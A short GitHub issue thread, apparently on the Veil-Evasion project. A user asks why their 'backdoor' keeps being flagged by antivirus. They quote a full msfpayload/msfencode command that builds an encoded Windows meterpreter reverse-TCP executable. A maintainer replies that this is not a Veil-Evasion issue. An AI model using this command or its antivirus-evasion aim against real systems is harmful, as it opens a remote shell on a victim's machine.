### ISSUE TITLE
Need help with Backdoor

### ISSUE THREAD

**Issue by shakmalik89** [Veil-Framework/Veil-Evasion#96]
I am making a backdoor but it is always detected I used this command:

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.x.xxx R| msfencode -e x86/shikata_ga_nai -t exe -a x86 -b '\x00\x0a\x0d'-c 1 x > /root/Desktop/test.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

And this file is detected on Windows 7

**Comment by ChrisTruncer** [comment]
Hey there,

So this isn't an issue with Veil-Evasion.  Some meterpreter payloads get caught based on the AV that is scanning them.  So you'll have to do some research on that, or ask the meterpreter/metasploit devs on it.
